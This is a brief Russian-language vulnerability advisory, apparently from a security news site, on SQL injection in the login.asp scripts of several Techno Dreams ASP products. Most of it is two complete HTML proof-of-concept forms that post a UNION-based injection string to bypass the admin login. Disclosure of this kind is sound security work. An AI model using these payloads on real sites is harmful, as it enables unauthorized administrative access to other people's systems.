Программа: 
Techno Dreams Web Directory
Techno Dreams Mailing List
Techno Dreams Guest Book
Techno Dreams Announcement 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена в сценарии login.asp при обработке входных данных пользователей. Удаленный пользователь может послать специально сформированный POST запрос и выполнить произвольные SQL команды в базе данных приложения. 

Пример:

<html>
< h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute
of Iran</a></p>
< form method="POST" action="http://target/admin/login.asp">
< input type="hidden" name="userid" value="'union all select '1','1' from admin where ''='">
< input type="hidden" name="passwd" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

<html>
< h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute
of Iran</a></p>
< form method="POST" action="http://target/login.asp">
< input type="hidden" name="userid" value="'union all select '1','1' from admin where ''='">
< input type="hidden" name="passwd" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>

Оставить мнение